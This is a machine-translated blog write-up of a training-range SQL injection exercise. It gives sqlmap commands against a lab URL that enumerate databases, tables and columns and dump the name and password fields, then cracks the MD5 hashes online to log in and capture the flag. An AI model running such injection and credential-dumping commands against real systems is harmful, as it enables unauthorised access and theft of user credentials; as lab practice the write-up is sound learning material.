当前位置:网站首页>Moher College - SQL injection vulnerability test (error reporting and blind note)
Moher College - SQL injection vulnerability test (error reporting and blind note)
2022-06-27 00:27:00 【Lyswbb】
Preface
This article is for technical discussion only , Study , Do not use for illegal purposes , It has nothing to do with me to use it for illegal purposes !
First, get to the shooting range and review the questions , It is obvious that it is an error injection

Visit the target after getting the range

Click... Under user login Notice on platform shutdown and maintenance

Click to find url by http://124.70.71.251:46004/new_list.php?id=1
An error is reported after trying to add a single quotation mark , Discovery database is mariaDB

Got it injection point , direct sqlmap Just a shuttle
Blast the name of the warehouse
python sqlmap.py -u http://124.70.71.251:46004/new_list.php?id=1%27 --dbs
Name of Pop Watch
python sqlmap.py -u http://124.70.71.251:46004/new_list.php?id=1%27 -D stormgroup --tables
Pop field name
python sqlmap.py -u http://124.70.71.251:46004/new_list.php?id=1%27 -D stormgroup -T member --columns
detonation name and password The content of
python sqlmap.py -u http://124.70.71.251:46004/new_list.php?id=1%27 -D stormgroup -T member -C name,password --dump 
Decrypt md5 Online decryption ,md5 Decryption encryption


Finally, you can log in and get flag

边栏推荐
- Nacos installation guide
- CVE-2022-30190 Follina Office RCE分析【附自定义word模板POC】
- 大赛报名 | AI+科学计算重点赛事之一——中国开源科学软件创意大赛,角逐十万奖金!
- 50 tips that unity beginners can definitely use
- Alibaba cloud server purchase, basic configuration, (xshell) remote connection and environment building
- Can I open an account for stock trading on my mobile phone? Is it safe to open an account for stock trading on the Internet
- 能在手机上开户炒股吗 网上开户炒股安全吗
- 超硬核!华为智慧屏上的家庭相册竟可以自动精准分类?
- 【Try to Hack】正向shell和反向shell
- 07 | 工作流设计:如何设计合理的多人开发模式?
猜你喜欢
随机推荐
From bitmap to bloom filter, C # implementation
Encapsulate servlet unified processing request
手机炒股靠谱吗 网上开户炒股安全吗
Your connection is not private
全網最全的混合精度訓練原理
[microservice]eureka
Concepts de base de données Oracle
Kubeadm create kubernetes cluster
能在手机上开户炒股吗 网上开户炒股安全吗
The most complete hybrid precision training principle in the whole network
How to write test cases and a brief introduction to go unit test tool testify
Freescale 单片机概述
[微服务]Nacos
Simulation of delta variant strain of novel coronavirus (mindsponge application)
Hit the point! The largest model training collection!
如何写好测试用例以及go单元测试工具testify简单介绍
Amway! How to provide high-quality issue? That's what Xueba wrote!
How to easily describe the process of machine learning?
com.fasterxml.jackson.databind.exc.MismatchedInputException: Expected array or string. at [Source:x
Target tracking shooting? Target occlusion shooting? With 1.9 billion installed petal apps, what unique features attract users?



![[微服务]Eureka](/img/60/e5fa18d004190d4dadebfb16b93550.png)

![[micro service]nacos](/img/69/6641e943c4366d5591acdf9e12389c.png)


